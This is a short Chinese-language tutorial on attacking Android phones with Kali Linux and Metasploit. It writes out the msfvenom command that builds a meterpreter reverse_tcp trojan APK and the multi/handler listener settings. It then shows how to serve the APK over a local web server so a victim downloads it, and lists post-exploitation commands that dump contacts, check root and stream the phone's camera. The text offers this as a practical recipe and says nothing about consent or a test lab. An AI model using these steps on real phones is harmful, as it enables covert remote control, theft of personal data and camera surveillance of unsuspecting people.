利用Kali攻击Android手机

一、Metasploit及其监听模块介绍

 

 Metasploit是一个免费的、可下载的框架，通过可以容易地地获取、开发并对计算机软件漏洞实施攻击。它本身附带数千个已知软件漏洞的专业漏洞攻击工具。

辅助模块（auxiliary）进行信息收集，执行扫描的功能。
渗透攻击模块（exploit）用于实际进行渗透攻击，得到一定的权限
攻击载荷模块（payload）把权限持久化，目标系统被成功渗透后执行的代码
后渗透攻击模块（post）进一步渗透测试:提权

handler 监听后门模块

   use exploit/multi/handler
（使用handler监听模块）

（设置攻击载荷模块）
set payload android/meterpreter/reverse_tcp

二、手机端渗透原理

利用msfvenom生成apk木马，攻击者通过链接给用户通过下载木马程序下载到手机端，前提在同一局域网下。当用户点击下载的木马程序，攻击者就可以通过木马远程控制对方含有木马的安卓手机端。
三、制作恶意软件并获取shell权限

生成android后门

msfvenom -p android/meterpreter/reverse_tcp lhost=本地IP lport=4444 > shell.apk

 

开启并使用msf中监听

 

 

 
* use exploit/multi/handler

* set payload android/meterpreter/reverse_tcp

* set lhost 本地ip
* set lport 4444
* run

下载apk

在kali中apk后门所在目录开启web服务：python -m SimpleHTTPServer

 

在安卓浏览器里访问网址下载apk

 

 

 

 

 

 

 

 

四、实战:远程控制

成功拿到msf中会建立会话，分别通过

执行命令
sysinfo  查看系统信息

app_list  查看安装app文件

 

 

check_root  检测系统root
dump_contacts 下载通讯录信息

webcam_list 获取摄像头信息

webcam_stream  开启摄像头

 

成功调用安卓摄像头。